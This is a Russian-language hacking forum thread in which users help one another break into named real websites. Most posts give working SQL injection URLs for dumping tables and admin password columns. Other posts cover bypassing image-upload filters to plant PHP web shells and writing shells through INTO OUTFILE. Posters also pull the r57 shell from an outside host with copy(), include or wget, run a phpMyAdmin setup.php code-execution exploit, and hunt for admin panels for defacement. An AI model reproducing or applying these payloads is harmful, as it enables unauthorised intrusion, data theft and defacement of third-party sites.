Konqi said:
http://www.editrans.de/?view=article&id=6+and+substring(version(),1,1)=5
а вот так не прокатило
http://www.editrans.de/?view=article&id=-6+or(1,1)=(select+count(0),concat((select+version( )+from+information_schema.tables+limit+0,1),floor( rand(0)*2))from(information_schema.tables)group+by +2)--+


Оно и не удивительно, вопрос на засыпку, почему второй вариант должен был прокатить то?

DrAssault said:
Оно и не удивительно, вопрос на засыпку, почему второй вариант должен был прокатить то?


ды сам не знаю,просто так написал..

а вот крутит старым добрым блайнд-ом не охота ((

[QUOTE="Bramin"]
Bramin said:
http://www.elixirherbals.com

есть админка..заливаю .php шелл не заливается..

долjна бить .jpg или .gif//

пробовал .php.%00jpg а тепер написаваются долjна бить картинка 800х800..

а как обходит ето ?

и пробовал менще размерниы (кб) шелл тоjэ такое..800х800//

k2b1~ said:
есть админка..заливаю .php шелл не заливается..
долjна бить .jpg или .gif//
пробовал .php.%00jpg а тепер написаваются долjна бить картинка 800х800..
а как обходит ето ?
и пробовал менще размерниы (кб) шелл тоjэ такое..800х800//


Возьми картинку любую, до 800х800, открой блокнотом и в самый конец файла впиши код простого шела, например


PHP:




И попробуй залить. При таком раскладе картинка должна пройти всякие там getimagesize и прочее.

Все, сдаюсь, мне не осилить (https://antichat.live/showpost.php/p/2220775/postcount/14004/) ваши шаманства

m0Hze said:
Возьми картинку любую, до 800х800, открой блокнотом и в самый конец файла впиши код простого шела, например

PHP:




И попробуй залить. При таком раскладе картинка должна пройти всякие там getimagesize и прочее.


pomoq spasib..

youthparliament.am

админку не моqу наыти..

если кто смоjэт помоqите поялуста..

/admin пробовал.

blind sql

Всем привет!

Кручу blind вида(в поле ввода мыла):


Code:
la@la.la' and (select if((select user from mysql.user limit 1)='root',1,0))='1

У пользователя есть права на insert/update, если можно, то как изменить запрос, чтобы можно было внести изменения в таблицу.

Ну т.е. я хочу в таблицу с новостями добавить php-код.

Прокатит ли такое?

k2b1~ said:
youthparliament.am
админку не моqу наыти..
если кто смоjэт помоqите поялуста..
/admin пробовал.


ну как на /admin нет прав, вот попробуй cPanel http://www.youthparliament.am/cpanel/

k2b1~ said:
youthparliament.am
админку не моqу наыти..
если кто смоjэт помоqите поялуста..
/admin пробовал.



снова из Азербайджанa, и сново дефейс Армянских сайтов?

не одобряю...

---------

p.s Pashkel я там нашел логи апача , но как не странно файлы пустые, как это возможно? запросы передаются гетом..

k2b1~ said:
pomoq spasib..


Что, залил такую картинку и шелл заработал? Круть, надо взять на вооружение

Konqi said:
снова из Азербайджанa, и сново дефейс Армянских сайтов?
p.s
Pashkel
я там нашел логи апача , но как не странно файлы пустые, как это возможно? запросы передаются гетом..


Нет, я конечно понимаю, жара и всё такое, но ты разве k2b1~ ? Почему ты мне пишешь про какие-то логи апача? Что за хрень вы тут понаписали вообще на последних двух страницах?)

Один просит как залить шелл ВМЕСТО картинки из админки (обойти фильтр на разрешение и т.д.), ему советуют вставить в конец картинки код, тот главное потом пишет спасибо (зохавал видать все интырнеты уже новым способом), теперь ты со своими логами - у дурки день открытых дверей?))))

Или там было написано "у меня кроме админки еще есть LFI"???)))

Pashkela said:
А ты запиши в EXIF, а не в конец файла, и, если картинка меняет размер после заливки (скриптом), то попробуй залить картинку такого же размера, как и тестируемая - может и прокатит
PS: Ну и потом, если есть LFI - есть и куча других способов - логи, сессия и etc.


вспомнил ?

2 Konqi:

Твоя тема аж на 1399 странице, посмотри номер этой, ты что, правда думаешь, так можно строить диалог? И с чего ты взял, что вот так вот просто можно через 3 страницы и два дня писать: "p.s Pashkel я там нашел логи апача , но как не странно файлы пустые, как это возможно? запросы передаются гетом.." и надеяться на то, что тебя поймут? Тем более ты же дальше пишешь уже про еще 10 ДРУГИХ сайтов - с логикой напряги?)))

главное "я там нашел" - ыыыыыыыыы

Pashkela понимаю =* sorry

а сейчас можно ответить? ))))

Здравствуйте уважаемые гуру и не только. Есть небольшая проблемка: есть иньекция postgresql 7.4 но иньекция в жопашном месте - select ххх from(select '123%INJ%' as code) as listcode left join то left join это и так далее с толпой сложных и малопонятных джойнов. Само собой простой комментарий -- все не комментирует, так что если поставить ; И написать свой запрос будет лишь ошибка.

Ошибки выводятся так что данные из бд получить проблем нет, темболее что пользователь суперюзер. Проблема в том что хочу в админку. А она сцука под паролем в htaccess. а без отдельного sql запроса файл, как я поглядел в мануалах, не прочитать.

Ну я подумал что не проблема - можно подключиться напрямую к серверу бд, ибо доступ к pg_shadow есть. Проблема в том что


Code:
array_to_string(array(select passwd::text from pg_shadow+where+usename=getpgusername()),','::text )

ругается нехорошими словами Query failed: ERROR: значения NULL как элементы массива не поддерживается. Эта ошибка ставит меня в тупик честно говоря - подумал ну мало-ли бывают пустые пароли. но блин какой запрос не составляй - хоть с array хоть без него подтвердить что в базе есть пользователи с не null паролями так и не смог. Странно короче.

Пы.Сы: таблиц с пользователями в различных бд этого сервака хренова туча все пароли админов не протестил но те что проверил к хтаксессу не подходят.

Konqi said:
Pashkela
понимаю =* sorry
а сейчас можно ответить? ))))


можно, если будет LFI в студию, откуда я знаю, что за логи апача ты там подключаешь и откуда ты берешь к ним пути и видно ли ошибки вообще и т.д.

к сожалению в студию не могу,отправлю в пм

вопрос такой:

есть стандартная скуль, подобрано количество полей, но при попытке вывести данные путем ввода некорректного значения id

index.php?id=-37+union+select+1,2/*

index.php?id=3111117+union+select+1,2/*

index.php?id=37+and+1=2+union+select+1,2/*

скрипт жалуется на некорректное значение id. есть еще какие-то способы или придется крутить вслепую?

Если ошибка выводится,крути как слепую с выводом в ошибку.

durito said:
вопрос такой:
есть стандартная скуль, подобрано количество полей, но при попытке вывести данные путем ввода некорректного значения id
index.php?id=-37+union+select+1,2/*
index.php?id=3111117+union+select+1,2/*
index.php?id=37+and+1=2+union+select+1,2/*
скрипт жалуется на некорректное значение id. есть еще какие-то способы или придется крутить вслепую?


попробуй типа этого...

index.php?id=-37)/**/and/**/1=2/**/uNion+all+seLect+null,null+from+information_schema .tables+limit+0,1/*

есле 5тая версия.. а не какайта там 3-тья иле четвертая..

и вообще тут уже многие говорили по 100 раз, никто не любит гадать, любо линк в студию либо надейся сам на удачу, и вообще версию хотя б сказал.

-> +AND+substring(version,1,1)=5

[Feldmarschall], нет, я понимаю конечно лето, мозги совсем плавятся, но как твой пример запроса поможет в вопросе дурито ? И кэп подсказывает что и так про блинд метод знает, но хочет добиться вывода.

durito, в голову приходит мысль попробовать помутить ченить с условиями типа такого

index.php?id=37+and+if(5=4,NULL,NUll)+union+select +1,2/*

но мне почему то кажется что все равно ничего не получится, и оно равносильно этому запросу

index.php?id=37+and+1=2+union+select+1,2/*

[QUOTE="Konqi"]
Konqi said:
ребят не могу залить шелл, в админке есть место для загрузки картинок,но стоит хороший фильтр и на стороне сервера и на JS..
при загрузке php файла вылетает aкошка JS и говорит что нельзя этот формат и тп, но файл все же загружается, но когда иду по линку файла то виден только один символ и пустая страница
то есть если контент файла

PHP:


то на странице видна только символ '[/COLOR][/COLOR]
[/PHP]
то на странице видна только символ '

durito said:
вопрос такой:
есть стандартная скуль, подобрано количество полей, но при попытке вывести данные путем ввода некорректного значения id
index.php?id=-37+union+select+1,2/*
index.php?id=3111117+union+select+1,2/*
index.php?id=37+and+1=2+union+select+1,2/*
скрипт жалуется на некорректное значение id. есть еще какие-то способы или придется крутить вслепую?


Понасоветовали тебе тут чёто не то ребята, ясно же сказано, ругается скрипт на несуществующее значение. Ну давай рассмотрим вот такой естественный способ продолжения логики основного запроса:

index.php?id=37+limit+0+union+select+1,2/*

Ну или так:

index.php?id=37+union+select+1,2+limit+1,1/*

http://www.nortun.am/pages.php?al=news&pid=1&id=568%27&act=more


вот поjaлсута помоqите раскрутить..

как то не получается

k2b1~ said:
вот поjaлсута помоqите раскрутить..
как то не получается




Code:
http://www.nortun.am/pages.php?al=news&pid=1&id=568'+and+(select+1+from+(select+count(0),concat ((select+version()),floor(rand(0)*2))+from+sed_zpa ges+group+by+2+limit+1)a)--+&act=more

DrAssault said:
Понасоветовали тебе тут чёто не то ребята, ясно же сказано, ругается скрипт на несуществующее значение. Ну давай рассмотрим вот такой естественный способ продолжения логики основного запроса:
index.php?id=37+limit+0+union+select+1,2/*
Ну или так:
index.php?id=37+union+select+1,2+limit+1,1/*


http://www.soulmades.com.au/index.php?ap=2956775+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,5 9,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75, 76,77,78,79,80/*

в первом случае The profile is not active!

во-втором тоже самое

http://www.soulmades.com.au/index.php?ap=2956775+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,5 9,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75, 76,77,78,79,80+limit+0,1/*

проходит, но толку

durito said:
http://www.soulmades.com.au/index.php?ap=2956775+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,5 9,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75, 76,77,78,79,80/*
в первом случае The profile is not active!
во-втором тоже самое
http://www.soulmades.com.au/index.php?ap=2956775+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,5 9,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75, 76,77,78,79,80+limit+0,1/*
проходит, но толку


версия базы 4.0.21-log так что все равно брутом надо табелки подбирать

Gorev брутом тянуть базу юзеров это анреал

durito said:
Gorev
брутом тянуть базу юзеров это анреал


что бы тебе тянуть брутом базу юзверей..тебе надо добратся до таблички и до колонок сперва... так как я сказал что версия базы 4-я и информатион схемы нет..так что подбери сначала имена табличек и колонок нужные..и только потом думай про дамп базы...вариантов несколько..ты подбираешь пасс админа и через админку заливаешь шелл ..а там уже и доступ прямой к базе..либо используешь какую нибудь тулзу для скулей..например сипт или что быстрее будет, тулзу от Пашкелы...

Делаю сканирование на уязвимости, используя OWASP Joomla! Vulnerability Scanner v0.0.3-a.


Target : http://www.city.m ogilev.by




~1.0.x joomla.javascript.js revealed 1.0.12
~1.0.x moscode.xml revealed [1.0.14 - 1.0.15]
* The Exact version found is 1.0.12


Если верить скрипту, то


# 23
Info -> CoreComponent: com_banners Blind SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_banners/
Exploit: /index.php?option=com_banners&task=archivesection&id=0'+and+'1'='1::/index.php?option=com_banners&task=archivesection&id=0'+and+'1'='2
Vulnerable? Yes


Я не понимаю как он понял, что можно провести Blind SQL в параметре id.

Irdis said:
Я не понимаю как он понял, что можно провести Blind SQL в параметре id.


а ты его спроси как он понял

durito said:
http://www.soulmades.com.au/index.php?ap=2956775+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,5 9,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75, 76,77,78,79,80+limit+0,1/*
проходит, но толку


Ты думаешь я просто так написал limit 1,1? Твой запрос по логике и должен проходить и выдать нам результат идентичный /index.php?ap=2956775


durito said:
http://www.soulmades.com.au/index.php?ap=2956775+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,5 9,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75, 76,77,78,79,80/*
в первом случае The profile is not active!
во-втором тоже самое


Если честно не смотрел твой сайт и вариантов тут может быть просто масса, но догадываюсь в чём проблема. Покажи мне как с помощью параметра передаваемого в гет ты можешь повлиять на контент страницы и я покажу тебе как сделать вывод Это типо пища для ума

а ты его спроси как он понял


он слишком болтливый.

Найти то что мне нужно займёт уйму времени (всего то пару тысяч строк кода на перле).

Может я не совсем точно выразился, меня не интересует как он нашёл, а если там injection. Я не вижу inj, но скрипт даёт повод для сомнений. Поэтому решил спросить у вас.

Irdis said:
он слишком болтливый.
Найти то что мне нужно займёт уйму времени (всего то пару тысяч строк кода на перле).
Может я не совсем точно выразился, меня не интересует как он нашёл, а если там injection. Я не вижу inj, но скрипт даёт повод для сомнений. Поэтому решил спросить у вас.


не надо верить всем скриптам и программам..а лучше проверить все руками...

Блиииин)

Сейчас ковырял сайт, который durito выложил, нашел другую инъекцию, замутил оригинальный запрос, но забыл что там 4.0 и не работают подзапросы


Code:
http://www.soulmades.com.au/index.php?list=profile&method=modify_form&id=-1+union+select+@a:=mid(version(),1,1),find_in_set( @a,'a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w, x,y,z, ,.,-'),3,4,find_in_set(@a,'1,2,3,4,5,6,7,8,9,0'),6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,4 2,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58, 59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75 ,76,77,78,79,80

Мб кому-нибудь пригодится)

Определяем переменную @a:=mid(version(),1,1)

И в зависимости от ее значения, получаем номер символа в day (если принадлежит [a-z .-]), либо в Children (если принадлежит [0-9])

Префикс у таблиц скорее всего soul_, потому что есть таблица soul_photo

PS: наконец-то нашел хоть какое-нибудь применение пользовательских переменных в инъекциях)

спасибо всем за советы, буду пробовать

Irdis said:
он слишком болтливый.
Найти то что мне нужно займёт уйму времени (всего то пару тысяч строк кода на перле).
Может я не совсем точно выразился, меня не интересует как он нашёл, а если там injection. Я не вижу inj, но скрипт даёт повод для сомнений. Поэтому решил спросить у вас.


Очень часто этот скрипт ошибается, особенно когда нет ошибки при наборе неправильно/несуществуюешего урла

А проверить - да, только ручками, мало ли что скрипты выдают

Наверное тупой вопрос, но подскажите как через SQL инъекцию вывести список баз данных на сервере? Ну INFORMATION_SCHEMA это ясно, а вот как узнать другие?

ZARO said:
Наверное тупой вопрос, но подскажите как через SQL инъекцию вывести список баз данных на сервере? Ну INFORMATION_SCHEMA это ясно, а вот как узнать другие?




Code:
select schema_name from information_schema.schemata

если так понял

Или так:


Code:
select table_schema from information_schema.tables

:."]
.:[melkiy]:. said:

Code:
select schema_name from information_schema.schemata

если так понял


Спсибо! То что нужно)

DrAssault said:
Или так:

Code:
select table_schema from information_schema.tables



И что, в бд примерно 40 табл, group_concat() ограничен 512 символами.

40 табл находится в базе bla1.

Просто тупо, bla1 40 раз повторится. Не вариант.

// 2Konqi, даже так.

// manual говорит что 512.

Ctacok said:
И что, в бд примерно 40 табл, group_concat() ограничен 512 символами.
40 табл находится в базе bla1.
Просто тупо, bla1 40 раз повторится.
Не вариант
.


первый 16 будут information_schema

А если так

select concat_ws(0x3A3a,table_schema,table_name,column_na me) from information_schema.columns limit 1,1

и лимитом перебирать? Будет выводить к какой базе относится таблица и поле, так и узнаем все базы на серваке. Или я не правильно понял вопрос

ZARO said:
Наверное тупой вопрос, но подскажите как через SQL инъекцию вывести список баз данных на сервере? Ну INFORMATION_SCHEMA это ясно, а вот как узнать другие?


(MSSQL)


Code:
use master
select * from sysdatabases

или


Code:
select name from master..sysdatabases

(MySQL)


Code:
SELECT CATALOG_NAME AS DataBaseName
FROM INFORMATION_SCHEMA.SCHEMATA

или


Code:
SELECT name AS DATABASENAME
FROM master.dbo.sysdatabases

Konqi said:
первый 16 будут information_schema


Хорошая статья про group_concat, почитай.


Code:
/thread118842.html

FlaktW said:
Хорошая статья про group_concat, почитай.

Code:
/thread118842.html




прости если я что то не так написал, просто я NooB в этих делах, что я не правильно сказал ?

can'not get tables....


Code:
http://www.infoimobiliar.ro/news.php?id=-597+uNioN+seLecT+1,2,unhex%28hex%28group_concat%28 table_name%29%29%29,4,5,6,7,8,9+from+information_s chema.tables--

547 said:
can'not get tables....

Code:
http://www.infoimobiliar.ro/news.php?id=-597+uNioN+seLecT+1,2,unhex%28hex%28group_concat%28 table_name%29%29%29,4,5,6,7,8,9+from+information_s chema.tables--



http://www.infoimobiliar.ro/news.php?id=-597+uNioN+seLecT+1,2,3,4,5,GrOuP_CoNcAt(TaBlE_NaMe ),7,8,9+from+information_schema.columns--

вывод в title

Подскажите плз как слить бд

Алкорайдер said:
Подскажите плз как слить бд


тебя посадят

а может скажешь что есть под рукой? шелл/админка/ и тп..или ничего? )

Konqi said:
http://www.infoimobiliar.ro/news.php?id=-597+uNioN+seLecT+1,2,3,4,5,GrOuP_CoNcAt(TaBlE_NaMe ),7,8,9+from+information_schema.columns--
вывод в title


вообщет ето не таблички...

title необязательно,так удобнее..

спс.

http://www.infoimobiliar.ro/news.php?id=-597+uNioN+seLecT+1,2,GrOuP_CoNcAt%28TaBlE_NaMe%20% 29,4,5,6,7,8,9+from+information_schema.tables--

Konqi said:
тебя посадят
а может скажешь что есть под рукой? шелл/админка/ и тп..или ничего? )


Врятли

Ничего, только sql-inj, но какбы там база огромная, поэтому хочу как-нибудь слить бд

547 said:
вообщет ето не таблички...
title необязательно,так удобнее..
спс.
http://www.infoimobiliar.ro/news.php?id=-597+uNioN+seLecT+1,2,GrOuP_CoNcAt%28TaBlE_NaMe%20% 29,4,5,6,7,8,9+from+information_schema.tables--


man я просто подумал что там фильтр на information_schema.tables поэтому сделал выборку из columns

Алкорайдер said:
Врятли
Ничего, только sql-inj, но какбы там база огромная, поэтому хочу как-нибудь слить бд


инъекция->админка->shell->дамп

или

инъекция->shell->дамп

Konqi said:
инъекция->админка->shell->дамп
или
инъекция->shell->дамп


инъекция->дамп (долго но можно=) )

Я немного не правильно выразился

Почти 1к БД, нужно как-то это всё слить и разобраться где там таблица с админскими пассами, т.к через inject там шелл не получается залить

вот (http://img39.imageshack.us/img39/9972/90752276.png) примерно так всё это выглядит, половина БД пустые

Алкорайдер said:
Я немного не правильно выразился
Почти 1к БД, нужно как-то это всё слить и разобраться где там таблица с админскими пассами, т.к через inject там шелл не получается залить
вот (http://img39.imageshack.us/img39/9972/90752276.png)
примерно так всё это выглядит, половина БД пустые


сделай запрос на вывод по другому..если админы в той же табелке что и обычные юзвери они отличаются статусом, левелом .попробуй что то типа : www.site.ru/news.php?id=[sql]+union+select+1,2,3,password+from+users+where+user _level=1--

ну или что то наподобее этого, все зависит от данных в твоей табличке с аккаунтами

Алкорайдер. В следующий раз делай скрин как, "черный квадрат малевича" ..

Как вариат, ищи вручную...

http://www.mynhw.co.uk/news-full.php?id=-644+UNION+SELECT+1,2,group_concat(table_name,0x3a, column_name),4,5,6,7,8,9,10,11,12,13+from+informat ion_schema.columns+where+column_name+like+0x257061 737325

Я халосий

v1d0qz said:
Алкорайдер
. В следующий раз делай скрин как, "черный квадрат малевича" ..
Как вариат, ищи вручную...
http://www.mynhw.co.uk/news-full.php?id=-644+UNION+SELECT+1,2,group_concat(table_name,0x3a, column_name),4,5,6,7,8,9,10,11,12,13+from+informat ion_schema.columns+where+column_name+like+0x257061 737325
Я халосий


Телепат, не?

Пробовал сам разобрать что там за урл, не получилось, думал норм замазал

Ок, попробую, спасибо

Ctacok said:
И что, в бд примерно 40 табл, group_concat() ограничен 512 символами.
40 табл находится в базе bla1.
Просто тупо, bla1 40 раз повторится.
Не вариант
.
// 2Konqi, даже так.
// manual говорит что 512.


Это безусловно ясно, я всего лишь предложил, как альтернативный вариант, тем более ограничение при group_concat() легко обходится substring(), а "лишнее" тоже можно исключить из вывода! Пример:


Code:
SELECT substring(GROUP_CONCAT(DISTINCT table_schema separator 0x0a),0,512)
FROM information_schema.tables



auth_root said:
А если так
select concat_ws(0x3A3a,table_schema,table_name,column_na me) from information_schema.columns limit 1,1
и лимитом перебирать? Будет выводить к какой базе относится таблица и поле, так и узнаем все базы на серваке. Или я не правильно понял вопрос


Долго и муторно это

Есть сайт с phpMyAdmin 2.11.8.1. Можно ли как нибудь войти в пхпмайадмин не имея логина и пароля?

Нашел вот этот (http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/) эксплоит, но не могу понять, что он мне даст =\.

И что прописать в:


$ftp_code = 'ftp://user
assword@ftp.com/www/test.txt'; /*полный ftp-путь до файла с содержимым */


?

Точнее как узнать полный ftp-путь до файла с содержимым ?

CyberHunter said:
Есть сайт с phpMyAdmin 2.11.8.1. Можно ли как нибудь войти в пхпмайадмин не имея логина и пароля?
Нашел вот
этот (http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/)
эксплоит, но не могу понять, что он мне даст =\.
И что прописать в:
?
Точнее как узнать полный ftp-путь до файла с содержимым ?


Загружаешь на свой ФТП файл test.txt с содержимым нужным, в скрипте указываешь адрес своего ФТП.

вроде блайнд,версия 5 хелп!!!


Code:
http://www.plan-art.co.uk/case.php?id=116+and+substring(@@version,1,1)=5--

http://www.plan-art.co.uk/case.php?id=116+and+(select+1+from+(select+count(0 ),concat((select+version()),floor(rand(0)*2))+from +information_schema.tables+group+by+2)a)--

pinch said:
http://www.plan-art.co.uk/case.php?id=116+and+(select+1+from+(select+count(0 ),concat((select+version()),floor(rand(0)*2))+from +information_schema.tables+group+by+2)a)--


неплохо, но хотелосьбы получить еще базы,таблички,колонки...и потом выдрать инфу из таблички...

желательно в подробностях...

неплохо, но хотелосьбы получить еще базы,таблички,колонки...и потом выдрать инфу из таблички...
желательно в подробностях...


table_name:


Code:
http://www.plan-art.co.uk/case.php?id=116+and+(select+1+from+(select+count(0 ),concat((select+table_name),floor(rand(0)*2))+fro m+information_schema.tables+group+by+2)a)+--+

admin

column_name:


Code:
http://www.plan-art.co.uk/case.php?id=116+and+(select+1+from+(select+count(0 ),concat((select+column_name),floor(rand(0)*2))+fr om+information_schema.columns+where+table_name='ad min'+group+by+2)a)+--+

password

Вместо version() пиши то, что тебе нужно.

Загружаешь на свой ФТП файл test.txt с содержимым нужным, в скрипте указываешь адрес своего ФТП.


С каким содержимым файл? В скрипте этом? (http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/)

И вообще можете объяснить, что сделает этот (http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/) скрипт?

CyberHunter said:
С каким содержимым файл? В скрипте
этом? (http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/)
И вообще можете объяснить, что сделает
этот (http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/)
скрипт?


Это сплоит на исполнение php кода

#

$pma_setup_url = 'http://site.com/phpMyAdmin/scripts/setup.php'; /*полный адрес скрипта установки phpMyAdmin*/

#

$ftp_code = 'ftp://userassword@ftp.com/www/test.txt'; /*полный ftp-путь до файла с содержимым */

В $pma_setup_url путь pma....

В $ftp_code путь к текстовому файлу на фтпшке, в этом файле будет пхп код который ты хочеш испольнить,например тот же phpinfo();

Что может быть проше?

Если ты следишь за лентами эксплойтов, то, наверняка, не должен был пропустить уязвимость популярнейшего менеджера баз данных MySql phpMyAdmin версий до 2.11.9 (http://www.gnucitizen.org/static/blog/2009/06/phpmyadminrcesh.txt).
Уязвимость заключалась в том, что скрипт установки ./scripts/setup.php вообще не проверял пользовательские данные, которые затем записывались в конфигурационный файл.
Эксплойт был всем хорош, кроме того, что администратор уязвимого хоста должен был вручную создать директорию ./config и дать ей права на запись (именно туда должен был записываться ядовитый конфиг), что на практике встречалось крайне редко. Настало время исправить это недоразумение.


script srazu vypolnyaet $ftp_code

547 said:
вроде блайнд,версия 5 хелп!!!

Code:
http://www.plan-art.co.uk/case.php?id=116+and+substring(@@version,1,1)=5--



Вы просто пипец..

Если вы не можете прочитать пару статей на эту тему, то хоть "сконструируйте" логический вопрос.


pinch said:
http://www.plan-art.co.uk/case.php?id=116+and+(select+1+from+(select+count(0 ),concat((select+version()),floor(rand(0)*2))+from +information_schema.tables+group+by+2)a)--




547 said:
неплохо, но хотелосьбы получить еще базы,таблички,колонки...и потом выдрать инфу из таблички...
желательно в подробностях...




CyberHunter said:
table_name:

Code:
http://www.plan-art.co.uk/case.php?id=116+and+(select+1+from+(select+count(0 ),concat((select+table_name),floor(rand(0)*2))+fro m+information_schema.tables+group+by+2)a)+--+

admin
column_name:

Code:
http://www.plan-art.co.uk/case.php?id=116+and+(select+1+from+(select+count(0 ),concat((select+column_name),floor(rand(0)*2))+fr om+information_schema.columns+where+table_name='ad min'+group+by+2)a)+--+

password
Вместо version() пиши то, что тебе нужно.


Может я старомоден, но люблю начинать с конца.

http://www.plan-art.co.uk/brochures.php?catid=-5+union+select+'',null+from+mysql.user+into+outfil e+'C:/plan/def/hello.php'

Урл без ввв > http://plan-art.co.uk/hello.php - палюсь

v1d0qz said:
Вы просто пипец..
Если вы не можете прочитать пару статей на эту тему, то хоть "сконструируйте" логический вопрос.
та я уже и сам допер на самом деле но всеравно спс...
просто непойму пока как вывести список всех таблиц а не одну? так само колонки...

547 said:
та я уже и сам допер на самом деле но всеравно спс...
просто непойму пока как вывести список всех таблиц а не одну? так само колонки...


насколько знаю не можешь

я думаю что можно

547 said:
я думаю что можно


ну так колдуй и покажи нам запрос, мне тоже интересно

Konqi said:
ну так колдуй и покажи нам запрос, мне тоже интересно


пока ниче неполучается

Груп_конкат там не катит, а значит нельзя.

а я о чем

Konqi said:
а я о чем


значит только лимитом,или прогой что куда проще...

Залил shell , работает.

http://site.com/index.php?id=1+UNION+SELECT+1,'',2,3,4,5,6+into+ou tfile+'/data/web/www/shell.php'+--+

Как теперь залить r57shell.php , без загрузки формы?

547 said:
значит только лимитом,или прогой что куда проще...


я юзаю limit, но не все же таблицы наc интересуют ) дело 2 минут

FlaktW said:
Залил shell , работает.
http://site.com/index.php?id=1+UNION+SELECT+1,'',2,3,4,5,6+into+ou tfile+'/data/web/www/shell.php'+--+
Как теперь залить r57shell.php , без загрузки формы?


?v=include("yoursite.ru/r57.php"); (allow_url_include=On)

?v=copy($_GET,$_GET[d]);&s=http://yoursite.ru/shell.txt&d=/data/web/www/r57.php;

но это при eval, зачем system


PHP:
''

FlaktW said:
Залил shell , работает.
http://site.com/index.php?id=1+UNION+SELECT+1,'',2,3,4,5,6+into+ou tfile+'/data/web/www/shell.php'+--+
Как теперь залить r57shell.php , без загрузки формы?


а почему сразу инклуд зделать нельзя?

потому что там allow_url_include Off Off

547 said:
а почему сразу инклуд зделать нельзя?



а если Allow_url_include=Off??

написал выше...

Konqi said:
а если
Allow_url_include=
Off
??
написал выше...


тогда

?cmd=wget http://site.ru/shell.php

547 said:
тогда
?cmd=wget http://site.ru/shell.php


это уже другое дело, но нету гарантии что на сервере установлен wget )

зачем затруднять все (((

copy($source, $destination);

547 said:
тогда
?cmd=wget http://site.ru/shell.php


там винда, вгет не пашет..

Konqi хорошо написал, грузи через ?v=copy($_GET,$_GET[d]);&s=http://yoursite.ru/shell.txt&d=/data/web/www/r57.php

кстати

'' евал вроде в винде непашет так что систем юзать наверное надо...

wkar said:
Konqi хорошо написал, грузи через ?v=copy($_GET
,$_GET[d]);&s=http://yoursite.ru/shell.txt&d=/data/web/www/r57.php



© Grey

547 said:
кстати
'' евал вроде в винде непашет так что систем юзать наверное надо...


пашет там все

wkar said:
пашет там все


незнаю у меня на локалхосте непашет

Parse error: syntax error, unexpected $end in C:\xampp\xampp\htdocs\cmd.php(1) : eval()'d code on line 1

Если ты пихаешь неверный код в эвал - это не значит, что в винде не работает.

547 said:
незнаю у меня на локалхосте непашет
Parse error: syntax error, unexpected $end in C:\xampp\xampp\htdocs\cmd.php(1) : eval()'d code on line 1


потому что ты кавычки тоже впихнул

я эт поставил для sql запроса )))

Konqi said:
потому что ты кавычки тоже впихнул
я эт поставил для sql запроса )))


все работает,дело было не в кавычках,я синтаксис немного знаю...

Сообщение от wildshaman

Если ты пихаешь неверный код в эвал - это не значит, что в винде не работает.

да все дело былов этом

Запускаю вот этот (http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/) эксплоит, но при запуске пишет:


This server could not verify that you are authorized to access the document requested. Either you supplied the wrong credentials (e.g., bad password), or your browser doesn't understand how to supply the credentials required.


В эксплоите поменял всего две строчки: $pma_setup_url (указал сайт на котором нужно выполнить код) и $ftp_code (указал доступ к файлу на фтп где мой код).

Что не так сделал?

CyberHunter said:
Запускаю вот
этот (http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/)
эксплоит, но при запуске пишет:
В эксплоите поменял всего две строчки: $pma_setup_url (указал сайт на котором нужно выполнить код) и $ftp_code (указал доступ к файлу на фтп где мой код).
Что не так сделал?


может просто залатили )

CyberHunter said:
Запускаю вот
этот (http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/)
эксплоит, но при запуске пишет:
В эксплоите поменял всего две строчки: $pma_setup_url (указал сайт на котором нужно выполнить код) и $ftp_code (указал доступ к файлу на фтп где мой код).
Что не так сделал?


basic авторизация на пма стоит?

CyberHunter said:
Запускаю вот
